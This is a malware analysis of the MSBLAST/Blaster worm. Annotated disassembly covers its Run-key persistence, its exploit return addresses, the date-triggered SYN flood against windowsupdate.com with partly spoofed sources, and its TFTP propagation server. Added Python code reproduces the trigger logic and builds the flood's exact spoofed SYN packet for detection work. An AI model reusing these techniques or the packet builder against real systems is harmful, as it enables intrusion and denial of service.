Tombkeeper # Whitecell.org
; Write the startup entry into the registry
00401250 55                 PUSH EBP
00401251 89E5               MOV EBP, ESP
00401253 81ECAC030000       SUB ESP, 000003AC
00401259 56                 PUSH ESI
0040125A 57                 PUSH EDI
0040125B 31F6               XOR ESI, ESI
0040125D 6A00               PUSH 00000000              ; lpdwDisposition
0040125F 8D45F8             LEA EAX, DWORD PTR [EBP-08]
00401262 50                 PUSH EAX                   ; phkResult
00401263 6A00               PUSH 00000000              ; lpSecurityAttributes
00401265 683F000F00         PUSH 000F003F              ; samDesired = KEY_ALL_ACCESS
0040126A 6A00               PUSH 00000000              ; dwOptions
0040126C 6A00               PUSH 00000000              ; lpClass
0040126E 6A00               PUSH 00000000              ; Reserved
00401270 685D484000         PUSH 0040485D              ; DB 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
00401275 6802000080         PUSH 80000002              ; HKEY_LOCAL_MACHINE
0040127A E80D110000         CALL 0040238C              ; ADVAPI32.RegCreateKeyExA
0040127F 6A32               PUSH 00000032              ; cbData
00401281 683C404000         PUSH 0040403C              ; DB 'msblast.exe',0
00401286 6A01               PUSH 00000001              ; dwType = REG_SZ
00401288 6A00               PUSH 00000000              ; Reserved
0040128A 6849484000         PUSH 00404849              ; DB 'windows auto update',0
0040128F FF75F8             PUSH DWORD PTR [EBP-08]    ; hKey
00401292 E801110000         CALL 00402398              ; ADVAPI32.RegSetValueExA
00401297 FF75F8             PUSH DWORD PTR [EBP-08]
0040129A E8E1100000         CALL 00402380              ; ADVAPI32.RegCloseKey
; Create the mutex
0040129F 6843484000         PUSH 00404843              ; DB 'BILLY',0
004012A4 6A01               PUSH 00000001              ; bInitialOwner
004012A6 6A00               PUSH 00000000
004012A8 E8A3100000         CALL 00402350              ; KERNEL32.CreateMutexA
........................
; Choose, at random, which OS the exploit payload is built for
00401476 E8BD0E0000         CALL 00402338              ; KERNEL32.GetTickCount
0040147B 50                 PUSH EAX                   ; GetTickCount result is the seed for srand
0040147C E8B30F0000         CALL 00402434              ; CRTDLL.srand
00401481 59                 POP ECX
00401482 E8890F0000         CALL 00402410              ; CRTDLL.rand
00401487 B914000000         MOV ECX, 00000014
0040148C 99                 CDQ
0040148D F7F9               IDIV ECX                   ; EDX = rand() % 20
0040148F 83FA0C             CMP EDX, 0000000C
00401492 7D02               JGE 00401496               ; both paths end up at 00401496, so this test has no effect
00401494 31F6               XOR ESI, ESI
00401496 C7053431400001000000 MOV DWORD PTR [00403134], 00000001   ; flag 1 = Windows XP
004014A0 E86B0F0000         CALL 00402410              ; CRTDLL.rand
004014A5 B90A000000         MOV ECX, 0000000A
004014AA 99                 CDQ
004014AB F7F9               IDIV ECX                   ; EDX = rand() % 10
004014AD 83FA07             CMP EDX, 00000007
004014B0 7E0A               JLE 004014BC               ; 0..7 (80%): keep XP
004014B2 C7053431400002000000 MOV DWORD PTR [00403134], 00000002   ; 8 or 9 (20%): flag 2 = Windows 2000
........................
00401954 833D3431400001     CMP DWORD PTR [00403134], 00000001   ; the flag decides whether the exploit is sent with the Windows 2000 or the Windows XP return address
0040195B 750C               JNE 00401969
0040195D C785ECEAFFFF9D130001 MOV DWORD PTR [EBP+FFFFEAEC], 0100139D   ; return address used for Windows XP
00401967 EB0A               JMP 00401973
00401969 C785ECEAFFFF9F751800 MOV DWORD PTR [EBP+FFFFEAEC], 0018759F   ; return address used for Windows 2000
........................
; Check the date
004014FC 6A03               PUSH 00000003              ; cchDate: buffer size
004014FE 8D45F4             LEA EAX, DWORD PTR [EBP-0C]
00401501 50                 PUSH EAX                   ; lpDateStr: buffer
00401502 683C484000         PUSH 0040483C              ; DB 'd',0  format picture: day of month
00401507 6A00               PUSH 00000000              ; lpDate: NULL = today
00401509 6A00               PUSH 00000000              ; dwFlags
0040150B 6809040000         PUSH 00000409              ; Locale 0x0409 = en-US, English (United States)
00401510 E8E70D0000         CALL 004022FC              ; KERNEL32.GetDateFormatA
00401515 6A03               PUSH 00000003
00401517 8D45F0             LEA EAX, DWORD PTR [EBP-10]
0040151A 50                 PUSH EAX
0040151B 683A484000         PUSH 0040483A              ; DB 'M',0  format picture: month
00401520 6A00               PUSH 00000000
00401522 6A00               PUSH 00000000
00401524 6809040000         PUSH 00000409
00401529 E8CE0D0000         CALL 004022FC              ; KERNEL32.GetDateFormatA
0040152E 8D45F4             LEA EAX, DWORD PTR [EBP-0C]
00401531 50                 PUSH EAX
00401532 E8790E0000         CALL 004023B0              ; CRTDLL.atoi
00401537 59                 POP ECX
00401538 83F80F             CMP EAX, 0000000F          ; is the day of the month greater than 15?
0040153B 7F0F               JG 0040154C                ; yes: go create the DoS thread
0040153D 8D7DF0             LEA EDI, DWORD PTR [EBP-10]
00401540 57                 PUSH EDI
00401541 E86A0E0000         CALL 004023B0              ; CRTDLL.atoi
00401546 59                 POP ECX
00401547 83F808             CMP EAX, 00000008          ; is the month greater than 8 (September or later)?
0040154A 7E16               JLE 00401562               ; no: skip; yes: fall through and create the DoS thread
0040154C 8D45FC             LEA EAX, DWORD PTR [EBP-04]
0040154F 50                 PUSH EAX                   ; lpThreadId
00401550 6A00               PUSH 00000000              ; dwCreationFlags
00401552 6A00               PUSH 00000000              ; lpParameter
00401554 68C11E4000         PUSH 00401EC1              ; lpStartAddress: DoS subroutine
00401559 6A00               PUSH 00000000              ; dwStackSize
0040155B 6A00               PUSH 00000000              ; lpThreadAttributes
0040155D E8120E0000         CALL 00402374              ; KERNEL32.CreateThread
; So the DoS thread is started on the 16th to the last day of every month, and on every day from September to December.
........................
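The two decisions above (which return address to use and whether to start the DoS thread) reduce to a few lines once the branches are followed. The Python below is an added example written for this page, not code from the worm or from the original analysis. It reproduces the date test and the random OS choice exactly as the listing encodes them, including the fact that the first rand() % 20 comparison has no effect, and enumerates the days of a year on which the DoS thread is created. It assumes an en-US locale, so that GetDateFormatA returns bare decimal day and month strings, and it takes the rand() results as an explicit input instead of calling srand/rand.

```python
import calendar
from datetime import date

# Return addresses the worm selects between (listing at 0040195D and 00401969).
RETURN_ADDRESS = {"xp": 0x0100139D, "2000": 0x0018759F}


def dos_trigger(day: int, month: int) -> bool:
    """The test at 00401538..0040154A: the DoS thread is created when the day of the
    month is greater than 15, or when the month is greater than 8 (September onward)."""
    return day > 15 or month > 8


def dos_active_days(year: int) -> list:
    """Every calendar day in `year` on which dos_trigger() fires (assumes an en-US
    locale, so GetDateFormatA yields plain decimal day and month as the worm expects)."""
    days = []
    for month in range(1, 13):
        for day in range(1, calendar.monthrange(year, month)[1] + 1):
            if dos_trigger(day, month):
                days.append(date(year, month, day))
    return days


def pick_target_os(rand_values) -> str:
    """Mirror of 00401476..004014B2, fed with the successive values rand() would return.
    Returns the OS whose return address the exploit will use."""
    it = iter(rand_values)
    first = next(it) % 20          # compared with 12 at 0040148F, but the JGE target and the
    flag = 1                       # fall-through both reach MOV [00403134], 1: always XP here
    second = next(it) % 10
    if second > 7:                 # 8 or 9: two outcomes in ten
        flag = 2
    return {1: "xp", 2: "2000"}[flag]


def os_split() -> dict:
    """Exact probability of each target, by enumerating the ten residues of rand() % 10.
    The first rand() call is irrelevant, so any value is passed for it."""
    counts = {"xp": 0, "2000": 0}
    for r in range(10):
        counts[pick_target_os([0, r])] += 1
    return {k: v / 10 for k, v in counts.items()}
```

dos_active_days(2003) gives 245 days, which is the window an analyst would quote for the DoS payload; August 11, 2003, the day the worm appeared, is not in it.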
; Address-resolution subroutine; the resolved IP is returned in EAX
00401E8B 55                 PUSH EBP
00401E8C 89E5               MOV EBP, ESP
00401E8E 56                 PUSH ESI
00401E8F 57                 PUSH EDI
00401E90 FF7508             PUSH DWORD PTR [EBP+08]    ; host string
00401E93 E8D8020000         CALL 00402170              ; WS2_32.inet_addr
00401E98 89C7               MOV EDI, EAX
00401E9A 31F6               XOR ESI, ESI
00401E9C 83FFFF             CMP EDI, FFFFFFFF          ; INADDR_NONE?
00401E9F 751A               JNE 00401EBB               ; if it was a dotted-quad IP, return it directly; otherwise resolve the host name
00401EA1 FF7508             PUSH DWORD PTR [EBP+08]
00401EA4 E827030000         CALL 004021D0              ; WS2_32.gethostbyname
00401EA9 89C6               MOV ESI, EAX
00401EAB 09F6               OR ESI, ESI
00401EAD 7505               JNE 00401EB4
00401EAF 83C8FF             OR EAX, FFFFFFFF           ; lookup failed: return -1
00401EB2 EB09               JMP 00401EBD
00401EB4 8B460C             MOV EAX, DWORD PTR [ESI+0C] ; hostent->h_addr_list
00401EB7 8B00               MOV EAX, DWORD PTR [EAX]   ; h_addr_list[0]
00401EB9 8B38               MOV EDI, DWORD PTR [EAX]   ; first IPv4 address
00401EBB 89F8               MOV EAX, EDI
00401EBD 5F                 POP EDI
00401EBE 5E                 POP ESI
00401EBF 5D                 POP EBP
00401EC0 C3                 RET
; DoS subroutine
00401EC1 55                 PUSH EBP
00401EC2 89E5               MOV EBP, ESP
00401EC4 51                 PUSH ECX
00401EC5 53                 PUSH EBX
00401EC6 56                 PUSH ESI
00401EC7 57                 PUSH EDI
00401EC8 C745FC01000000     MOV DWORD PTR [EBP-04], 00000001   ; optval = 1 for IP_HDRINCL
00401ECF 68EC474000         PUSH 004047EC              ; DB 'windowsupdate.com',0
00401ED4 E8B2FFFFFF         CALL 00401E8B              ; address-resolution subroutine
00401ED9 59                 POP ECX
00401EDA 89C6               MOV ESI, EAX               ; ESI holds the resolved target IP
00401EDC 6A01               PUSH 00000001              ; dwFlags = WSA_FLAG_OVERLAPPED
00401EDE 6A00               PUSH 00000000              ; g
00401EE0 6A00               PUSH 00000000              ; lpProtocolInfo
00401EE2 68FF000000         PUSH 000000FF              ; protocol = IPPROTO_RAW
00401EE7 6A03               PUSH 00000003              ; type = SOCK_RAW
00401EE9 6A02               PUSH 00000002              ; af = AF_INET
00401EEB E84C030000         CALL 0040223C              ; WS2_32.WSASocketA
00401EF0 89C7               MOV EDI, EAX
00401EF2 83F8FF             CMP EAX, FFFFFFFF          ; INVALID_SOCKET?
00401EF5 7504               JNE 00401EFB
00401EF7 31C0               XOR EAX, EAX
00401EF9 EB34               JMP 00401F2F
00401EFB 6A04               PUSH 00000004              ; optlen
00401EFD 8D45FC             LEA EAX, DWORD PTR [EBP-04]
00401F00 50                 PUSH EAX                   ; optval
00401F01 6A02               PUSH 00000002              ; optname = IP_HDRINCL
00401F03 6A00               PUSH 00000000              ; level = IPPROTO_IP
00401F05 57                 PUSH EDI                   ; socket
00401F06 E8AD020000         CALL 004021B8              ; WS2_32.setsockopt: the worm will supply its own IP header
00401F0B 83F8FF             CMP EAX, FFFFFFFF
00401F0E 7504               JNE 00401F14               ; success: continue
00401F10 31C0               XOR EAX, EAX
00401F12 EB1B               JMP 00401F2F
00401F14 57                 PUSH EDI                   ; socket
00401F15 56                 PUSH ESI                   ; target IP
00401F16 E81B000000         CALL 00401F36              ; SYN flood packet-sending subroutine
00401F1B 83C408             ADD ESP, 00000008
00401F1E 6A14               PUSH 00000014
00401F20 E837040000         CALL 0040235C              ; KERNEL32.Sleep 20 ms
00401F25 EBED               JMP 00401F14               ; loop forever: one SYN every 20 ms
00401F27 57                 PUSH EDI                   ; never reached
00401F28 E8C7020000         CALL 004021F4              ; WS2_32.closesocket
00401F2D 31C0               XOR EAX, EAX
00401F2F 5F                 POP EDI
00401F30 5E                 POP ESI
00401F31 5B                 POP EBX
00401F32 C9                 LEAVE
00401F33 C20400             RET 0004
; SYN flood packet-sending subroutine (target IP at [EBP+08], raw socket at [EBP+0C])
00401F36 55                 PUSH EBP
00401F37 89E5               MOV EBP, ESP
00401F39 81EC9C000000       SUB ESP, 0000009C
00401F3F 53                 PUSH EBX
00401F40 56                 PUSH ESI
00401F41 57                 PUSH EDI
00401F42 8D7D9C             LEA EDI, DWORD PTR [EBP-64]       ; packet buffer
00401F45 8D35B0474000       LEA ESI, DWORD PTR [004047B0]
00401F4B B90F000000         MOV ECX, 0000000F
00401F50 F3A5               REP MOVSD                         ; copy 15 dwords (60 bytes) of template from 004047B0
00401F52 66C7857EFFFFFF5000 MOV WORD PTR [EBP+FFFFFF7E], 0050  ; target port 80
00401F5B E8D8030000         CALL 00402338                     ; KERNEL32.GetTickCount
00401F60 50                 PUSH EAX                          ; GetTickCount result is the seed for srand
00401F61 E8CE040000         CALL 00402434                     ; CRTDLL.srand
00401F66 E8A5040000         CALL 00402410                     ; CRTDLL.rand
00401F6B 898568FFFFFF       MOV DWORD PTR [EBP+FFFFFF68], EAX
00401F71 E89A040000         CALL 00402410                     ; CRTDLL.rand
00401F76 B9FF000000         MOV ECX, 000000FF
00401F7B 99                 CDQ
00401F7C F7F9               IDIV ECX
00401F7E 52                 PUSH EDX                          ; rand() % 255: fourth octet
00401F7F 8BBD68FFFFFF       MOV EDI, DWORD PTR [EBP+FFFFFF68]
00401F85 89F8               MOV EAX, EDI
00401F87 B9FF000000         MOV ECX, 000000FF
00401F8C 99                 CDQ
00401F8D F7F9               IDIV ECX
00401F8F 52                 PUSH EDX                          ; rand() % 255: third octet
00401F90 FF3538314000       PUSH DWORD PTR [00403138]         ; these two globals hold the first two octets of this machine's IP
00401F96 FF3514304000       PUSH DWORD PTR [00403014]
; The SYN flood source address is not fully random: the first two octets are the machine's real ones and
; only the last two are random. This is probably to get past network devices that drop packets whose
; source address does not belong to the local network.
00401F9C 682B484000         PUSH 0040482B                     ; DB '%i.%i.%i.%i',0
00401FA1 8DBD6EFFFFFF       LEA EDI, DWORD PTR [EBP+FFFFFF6E]
00401FA7 57                 PUSH EDI                          ; output: the generated IP string
00401FA8 E87B040000         CALL 00402428                     ; CRTDLL.sprintf
00401FAD 8D856EFFFFFF       LEA EAX, DWORD PTR [EBP+FFFFFF6E]
00401FB3 50                 PUSH EAX
00401FB4 E8D2FEFFFF         CALL 00401E8B                     ; address-resolution subroutine
00401FB9 89C3               MOV EBX, EAX                      ; EBX = spoofed source IP (network byte order)
; Build the SYN packet: sockaddr_in at [EBP-80], IP header at [EBP-14], TCP header at [EBP-28],
; TCP pseudo-header at [EBP-70], the assembled packet at [EBP-64]
00401FBB 66C745800200       MOV WORD PTR [EBP-80], 0002       ; sin_family = AF_INET
00401FC1 0FB7857EFFFFFF     MOVZX EAX, WORD PTR [EBP+FFFFFF7E]
00401FC8 50                 PUSH EAX                          ; target port 80
00401FC9 E88A010000         CALL 00402158                     ; WS2_32.htons
00401FCE 89C7               MOV EDI, EAX
00401FD0 66897D82           MOV WORD PTR [EBP-7E], DI         ; sin_port
00401FD4 8B4508             MOV EAX, DWORD PTR [EBP+08]
00401FD7 894584             MOV DWORD PTR [EBP-7C], EAX       ; sin_addr = target IP
00401FDA C645EC45           MOV BYTE PTR [EBP-14], 45         ; IP: version 4, header length 5 dwords
00401FDE 6A28               PUSH 00000028                     ; total length 40 = 20 IP + 20 TCP
00401FE0 E873010000         CALL 00402158                     ; WS2_32.htons
00401FE5 89C7               MOV EDI, EAX
00401FE7 66897DEE           MOV WORD PTR [EBP-12], DI         ; IP total length
00401FEB 66C745F00100       MOV WORD PTR [EBP-10], 0001       ; identification: 1
00401FF1 66C745F20000       MOV WORD PTR [EBP-0E], 0000       ; fragment offset: 0
00401FF7 C645F480           MOV BYTE PTR [EBP-0C], 80         ; TTL: 128
00401FFB C645F506           MOV BYTE PTR [EBP-0B], 06         ; protocol: TCP
00401FFF 66C745F60000       MOV WORD PTR [EBP-0A], 0000       ; IP checksum: 0 for now
00402005 8B4508             MOV EAX, DWORD PTR [EBP+08]
00402008 8945FC             MOV DWORD PTR [EBP-04], EAX       ; destination IP
0040200B 0FB7857EFFFFFF     MOVZX EAX, WORD PTR [EBP+FFFFFF7E]
00402012 50                 PUSH EAX
00402013 E840010000         CALL 00402158                     ; WS2_32.htons
00402018 89C7               MOV EDI, EAX
0040201A 66897DDA           MOV WORD PTR [EBP-26], DI         ; TCP destination port 80
0040201E 8365E000           AND DWORD PTR [EBP-20], 00000000  ; acknowledgement number: 0
00402022 C645E450           MOV BYTE PTR [EBP-1C], 50         ; data offset 5 dwords (20-byte TCP header)
00402026 C645E502           MOV BYTE PTR [EBP-1B], 02         ; flags: SYN
0040202A 6800400000         PUSH 00004000                     ; TCP window: 16384
0040202F E824010000         CALL 00402158                     ; WS2_32.htons
00402034 89C7               MOV EDI, EAX
00402036 66897DE6           MOV WORD PTR [EBP-1A], DI         ; [EBP-1A] TCP window: 16384
0040203A 66C745EA0000       MOV WORD PTR [EBP-16], 0000       ; urgent pointer: 0
00402040 66C745E80000       MOV WORD PTR [EBP-18], 0000       ; TCP checksum: 0 for now
00402046 8B45FC             MOV EAX, DWORD PTR [EBP-04]
00402049 894594             MOV DWORD PTR [EBP-6C], EAX       ; pseudo-header: destination IP
0040204C C6459800           MOV BYTE PTR [EBP-68], 00         ; pseudo-header: zero byte
00402050 C6459906           MOV BYTE PTR [EBP-67], 06         ; pseudo-header: protocol TCP
00402054 6A14               PUSH 00000014                     ; pseudo-header: TCP length 20
00402056 E8FD000000         CALL 00402158                     ; WS2_32.htons
0040205B 89C7               MOV EDI, EAX
0040205D 66897D9A           MOV WORD PTR [EBP-66], DI
00402061 895DF8             MOV DWORD PTR [EBP-08], EBX       ; IP source address = the spoofed IP
00402064 E8A7030000         CALL 00402410                     ; CRTDLL.rand
00402069 B9E8030000         MOV ECX, 000003E8
0040206E 99                 CDQ
0040206F F7F9               IDIV ECX                          ; rand() % 1000
00402071 89D7               MOV EDI, EDX
00402073 81C7E8030000       ADD EDI, 000003E8                 ; + 1000: source port is always 1000..1999
00402079 81E7FFFF0000       AND EDI, 0000FFFF
0040207F 57                 PUSH EDI                          ; randomly generated source port
00402080 E8D3000000         CALL 00402158                     ; WS2_32.htons
00402085 89C7               MOV EDI, EAX
00402087 66897DD8           MOV WORD PTR [EBP-28], DI         ; TCP source port
0040208B E880030000         CALL 00402410                     ; CRTDLL.rand
00402090 898564FFFFFF       MOV DWORD PTR [EBP+FFFFFF64], EAX
00402096 E875030000         CALL 00402410                     ; CRTDLL.rand: randomly generated sequence number
0040209B 8BBD64FFFFFF       MOV EDI, DWORD PTR [EBP+FFFFFF64]
004020A1 C1E710             SHL EDI, 10
004020A4 09C7               OR EDI, EAX                       ; (rand() << 16) | rand()
004020A6 81E7FFFF0000       AND EDI, 0000FFFF                 ; but then masked to 16 bits
004020AC 57                 PUSH EDI
004020AD E8A6000000         CALL 00402158                     ; WS2_32.htons: and byte-swapped as a 16-bit value
004020B2 89C7               MOV EDI, EAX
004020B4 81E7FFFF0000       AND EDI, 0000FFFF
004020BA 897DDC             MOV DWORD PTR [EBP-24], EDI       ; sequence number: only the low 16 bits are ever non-zero
004020BD 895D90             MOV DWORD PTR [EBP-70], EBX       ; pseudo-header: source IP
004020C0 6A0C               PUSH 0000000C
004020C2 8D4590             LEA EAX, DWORD PTR [EBP-70]
004020C5 50                 PUSH EAX
004020C6 8D459C             LEA EAX, DWORD PTR [EBP-64]
004020C9 50                 PUSH EAX
004020CA E81D030000         CALL 004023EC                     ; CRTDLL.memcpy: 12-byte pseudo-header into the buffer
004020CF 6A14               PUSH 00000014
004020D1 8D45D8             LEA EAX, DWORD PTR [EBP-28]
004020D4 50                 PUSH EAX
004020D5 8D45A8             LEA EAX, DWORD PTR [EBP-58]
004020D8 50                 PUSH EAX
004020D9 E80E030000         CALL 004023EC                     ; CRTDLL.memcpy: 20-byte TCP header right after it
004020DE 6A20               PUSH 00000020
004020E0 8D459C             LEA EAX, DWORD PTR [EBP-64]
004020E3 50                 PUSH EAX
004020E4 E857FDFFFF         CALL 00401E40                     ; presumably the checksum routine (listing not shown), over the 32 bytes
004020E9 89C7               MOV EDI, EAX
004020EB 66897DE8           MOV WORD PTR [EBP-18], DI         ; TCP checksum
004020EF 6A14               PUSH 00000014
004020F1 8D45EC             LEA EAX, DWORD PTR [EBP-14]
004020F4 50                 PUSH EAX
004020F5 8D459C             LEA EAX, DWORD PTR [EBP-64]
004020F8 50                 PUSH EAX
004020F9 E8EE020000         CALL 004023EC                     ; CRTDLL.memcpy: IP header to buffer offset 0
004020FE 6A14               PUSH 00000014
00402100 8D45D8             LEA EAX, DWORD PTR [EBP-28]
00402103 50                 PUSH EAX
00402104 8D45B0             LEA EAX, DWORD PTR [EBP-50]       ; buffer offset 20: TCP header, which starts with the source port
00402107 50                 PUSH EAX
00402108 E8DF020000         CALL 004023EC                     ; CRTDLL.memcpy
0040210D 6A04               PUSH 00000004
0040210F 6A00               PUSH 00000000
00402111 8D45C4             LEA EAX, DWORD PTR [EBP-3C]
00402114 50                 PUSH EAX
00402115 E8DE020000         CALL 004023F8                     ; CRTDLL.memset: zero 4 bytes after the 40-byte packet
0040211A 6A28               PUSH 00000028
0040211C 8D459C             LEA EAX, DWORD PTR [EBP-64]
0040211F 50                 PUSH EAX
00402120 E81BFDFFFF         CALL 00401E40                     ; checksum over all 40 bytes (RFC 791 covers only the 20-byte IP header)
00402125 89C7               MOV EDI, EAX
00402127 66897DF6           MOV WORD PTR [EBP-0A], DI         ; IP checksum
0040212B 6A14               PUSH 00000014
0040212D 8D45EC             LEA EAX, DWORD PTR [EBP-14]
00402130 50                 PUSH EAX
00402131 8D459C             LEA EAX, DWORD PTR [EBP-64]
00402134 50                 PUSH EAX
00402135 E8B2020000         CALL 004023EC                     ; CRTDLL.memcpy: IP header again, now with its checksum
0040213A 83C478             ADD ESP, 00000078
0040213D 6A10               PUSH 00000010                     ; tolen
0040213F 8D4580             LEA EAX, DWORD PTR [EBP-80]
00402142 50                 PUSH EAX                          ; to: the sockaddr_in
00402143 6A00               PUSH 00000000                     ; flags
00402145 6A28               PUSH 00000028                     ; len: 40
00402147 8D459C             LEA EAX, DWORD PTR [EBP-64]
0040214A 50                 PUSH EAX                          ; buf
0040214B FF750C             PUSH DWORD PTR [EBP+0C]           ; socket
0040214E E859000000         CALL 004021AC                     ; WS2_32.sendto: send the packet
00402153 5F                 POP EDI
00402154 5E                 POP ESI
00402155 5B                 POP EBX
00402156 C9                 LEAVE
00402157 C3                 RET
..................
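To make the packet layout above concrete, here is an added Python example (not code from the worm or from the original analysis) that builds the same 40-byte IP+TCP SYN the listing assembles at [EBP-64]: the same constants (0x45, identification 1, TTL 128, window 16384, destination port 80), the same source-address and source-port recipes, and the same sequence number that keeps only 16 significant bits. It computes the TCP checksum over the 12-byte pseudo-header plus the TCP header, as the worm does, but computes the IP checksum over the 20-byte header only, which is what RFC 791 specifies (the listing feeds all 40 bytes to its routine). The function names and the use of Python's random in place of CRTDLL rand() are this example's own assumptions. Nothing is sent: parse_syn() decodes the bytes and re-verifies both checksums, which is also what you would run over packets captured from such a flood.

```python
import random
import socket
import struct

TARGET_PORT = 80          # the word written at [EBP+FFFFFF7E]
TCP_WINDOW = 0x4000       # 16384
TTL = 128


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; the job of the routine the worm calls at 00401E40."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def spoofed_source(local_ip: str, rng: random.Random) -> str:
    """First two octets real, last two are rand() % 255, as at 00401F7E..00401FA8."""
    a, b, _, _ = local_ip.split(".")
    return "%s.%s.%i.%i" % (a, b, rng.randrange(255), rng.randrange(255))


def worm_source_port(rng: random.Random) -> int:
    """(rand() % 1000 + 1000) & 0xFFFF, as at 00402064..00402079: always 1000..1999."""
    return (rng.randrange(1 << 15) % 1000 + 1000) & 0xFFFF


def worm_sequence(rng: random.Random) -> int:
    """((rand() << 16) | rand()) & 0xFFFF, then htons, as at 0040208B..004020BA: the mask
    leaves 16 significant bits, so the 32-bit field never uses its high half."""
    hi, lo = rng.randrange(1 << 15), rng.randrange(1 << 15)
    return socket.htons(((hi << 16) | lo) & 0xFFFF)


def build_syn(src_ip: str, dst_ip: str, src_port: int, seq: int, dst_port: int = TARGET_PORT) -> bytes:
    """Assemble the 40-byte IP+TCP SYN the listing builds at [EBP-64] and hands to sendto()."""
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    # IP header, the fields written at [EBP-14]..[EBP-04]: 0x45, tos 0, length 40, id 1,
    # no fragmentation, TTL 128, protocol 6, checksum placeholder, source, destination.
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 1, 0, TTL, 6, 0, src, dst)
    # TCP header, the fields written at [EBP-28]..[EBP-16]: ports, seq, ack 0, data offset 5,
    # flags SYN (0x02), window 16384, checksum placeholder, urgent pointer 0.
    tcp_hdr = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0, 0x50, 0x02, TCP_WINDOW, 0, 0)
    # 12-byte pseudo-header built at [EBP-70]: source, destination, zero, protocol 6, TCP length 20.
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, 6, len(tcp_hdr))
    tcp_hdr = tcp_hdr[:16] + struct.pack("!H", internet_checksum(pseudo + tcp_hdr)) + tcp_hdr[18:]
    # RFC 791: the IP checksum covers the 20-byte header only (the worm feeds all 40 bytes).
    ip_hdr = ip_hdr[:10] + struct.pack("!H", internet_checksum(ip_hdr)) + ip_hdr[12:]
    return ip_hdr + tcp_hdr


def make_flood_packet(local_ip: str, target_ip: str, seed: int) -> bytes:
    """One packet of the flood, with a fixed seed (the worm seeds srand with GetTickCount)."""
    rng = random.Random(seed)
    return build_syn(spoofed_source(local_ip, rng), target_ip, worm_source_port(rng), worm_sequence(rng))


def parse_syn(pkt: bytes) -> dict:
    """Decode a 40-byte packet and re-verify both checksums (a correct header sums to zero)."""
    _vi, _tos, total_len, ident, _frag, ttl, proto, _ipcs, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    sport, dport, seq, ack, _off, flags, win, _tcpcs, _urg = struct.unpack("!HHIIBBHHH", pkt[20:40])
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, proto, len(pkt) - 20)
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl, "proto": proto,
        "ident": ident, "total_len": total_len, "sport": sport, "dport": dport, "seq": seq,
        "ack": ack, "flags": flags, "window": win,
        "ip_checksum_ok": internet_checksum(pkt[:20]) == 0,
        "tcp_checksum_ok": internet_checksum(pseudo + pkt[20:]) == 0,
    }
```

The fixed fields (identification 1, TTL 128, window 16384, SYN only, source port in 1000..1999, a sequence number below 0x10000, source /16 equal to the sender's own) are exactly the kind of constants a capture filter or IDS rule for this flood would key on.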
; TFTP server function
00401576 55                 PUSH EBP
00401577 89E5               MOV EBP, ESP
00401579 81EC2C040000       SUB ESP, 0000042C
0040157F 53                 PUSH EBX
00401580 56                 PUSH ESI
00401581 57                 PUSH EDI
00401582 C7051840400001000000 MOV DWORD PTR [00404018], 00000001
0040158C 6A00               PUSH 00000000              ; protocol
0040158E 6A02               PUSH 00000002              ; SOCK_DGRAM: UDP
00401590 6A02               PUSH 00000002              ; AF_INET
00401592 E82D0C0000         CALL 004021C4              ; WS2_32.socket
00401597 A324314000         MOV DWORD PTR [00403124], EAX   ; global: the TFTP socket
0040159C 83F8FF             CMP EAX, FFFFFFFF
0040159F 0F8445010000       JE 004016EA
004015A5 6A10               PUSH 00000010
004015A7 6A00               PUSH 00000000
004015A9 8D85D8FDFFFF       LEA EAX, DWORD PTR [EBP+FFFFFDD8]
004015AF 50                 PUSH EAX
004015B0 E8430E0000         CALL 004023F8              ; CRTDLL.memset: zero the sockaddr_in
004015B5 83C40C             ADD ESP, 0000000C
004015B8 66C785D8FDFFFF0200 MOV WORD PTR [EBP+FFFFFDD8], 0002   ; sin_family = AF_INET
004015C1 6A45               PUSH 00000045              ; port 69: TFTP
004015C3 E8900B0000         CALL 00402158              ; WS2_32.htons
004015C8 89C2               MOV EDX, EAX
004015CA 668995DAFDFFFF     MOV WORD PTR [EBP+FFFFFDDA], DX    ; sin_port
004015D1 83A5DCFDFFFF00     AND DWORD PTR [EBP+FFFFFDDC], 00000000   ; sin_addr = INADDR_ANY
004015D8 6A10               PUSH 00000010
004015DA 8D85D8FDFFFF       LEA EAX, DWORD PTR [EBP+FFFFFDD8]
004015E0 50                 PUSH EAX
004015E1 FF3524314000       PUSH DWORD PTR [00403124]
004015E7 E8F00B0000         CALL 004021DC              ; WS2_32.bind
004015EC 09C0               OR EAX, EAX
004015EE 0F85F6000000       JNE 004016EA
004015F4 C785F8FDFFFF10000000 MOV DWORD PTR [EBP+FFFFFDF8], 00000010   ; fromlen
004015FE 8D85F8FDFFFF       LEA EAX, DWORD PTR [EBP+FFFFFDF8]
00401604 50                 PUSH EAX                   ; fromlen
00401605 8D85E8FDFFFF       LEA EAX, DWORD PTR [EBP+FFFFFDE8]
0040160B 50                 PUSH EAX                   ; from
0040160C 6A00               PUSH 00000000              ; flags
0040160E 6804020000         PUSH 00000204              ; len 516: the largest TFTP packet (4-byte header + 512 bytes of data)
00401613 8D85D4FBFFFF       LEA EAX, DWORD PTR [EBP+FFFFFBD4]
00401619 50                 PUSH EAX                   ; buf
0040161A FF3524314000       PUSH DWORD PTR [00403124]
00401620 E8630B0000         CALL 00402188              ; WS2_32.recvfrom: wait for a request
00401625 83F801             CMP EAX, 00000001
00401628 0F8CBC000000       JL 004016EA                ; nothing received: give up
0040162E 31DB               XOR EBX, EBX
00401630 6837484000         PUSH 00404837              ; DB 'rb',0  open read-only, binary mode
00401635 6820304000         PUSH 00403020              ; global: absolute path of the worm's own file
0040163A E8950D0000         CALL 004023D4              ; CRTDLL.fopen
Like Nimda, this worm's built-in TFTP server returns the worm's own file whatever file name was requested, so it cannot be used to disclose system files. Unlike Nimda, this TFTP server runs only after a machine has been successfully attacked, for as long as it takes to push the worm to the new victim. That is why UDP/69 is not seen listening on a system infected with MSBLAST.EXE.
